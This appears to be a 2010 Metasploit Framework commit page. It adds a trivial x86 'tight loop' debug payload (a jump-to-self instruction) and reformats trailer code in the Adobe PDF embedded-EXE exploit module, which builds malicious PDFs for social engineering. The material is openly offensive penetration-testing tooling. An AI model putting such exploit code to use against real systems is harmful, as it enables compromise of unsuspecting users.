infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add payload/generic/tight_loop - x86 debug payload 

git-svn-id: file:///home/svn/framework3/trunk@9070 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-04-14 07:40:04 +00:00
parent 56d50d6794
commit 321404e2fe
2 changed files with 41 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
View File

@ -68,7 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
startxrefs = pdf_objects[2] startxrefs = pdf_objects[2]
root_obj = pdf_objects[3] root_obj = pdf_objects[3]
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last) output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
print_status("Creating '#{datastore['FILENAME']}' file...") print_status("Creating '#{datastore['FILENAME']}' file...")
@ -339,7 +338,11 @@ class Metasploit3 < Msf::Exploit::Remote
if trailers[0].has_key?("ID") if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n" new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else else
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n" new_pdf << "xref\r\n" << xrefs
new_pdf << "trailer\r\n"
new_pdf << "<</Size #{new_size}/Prev #{startxref}"
new_pdf << "/Root #{trailers[0].fetch("Root")} R"
new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n"
end end
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"

35
modules/payloads/singles/generic/tight_loop.rb Normal file
View File

@ -0,0 +1,35 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/payload/generic'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Generic x86 Tight Loop',
'Version' => '$Revision$',
'Description' => 'Generate a tight loop in the target process',
'Author' => 'jduck',
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Payload' =>
{
'Payload' => "\xeb\xfe" # jump to self
}
))
end
end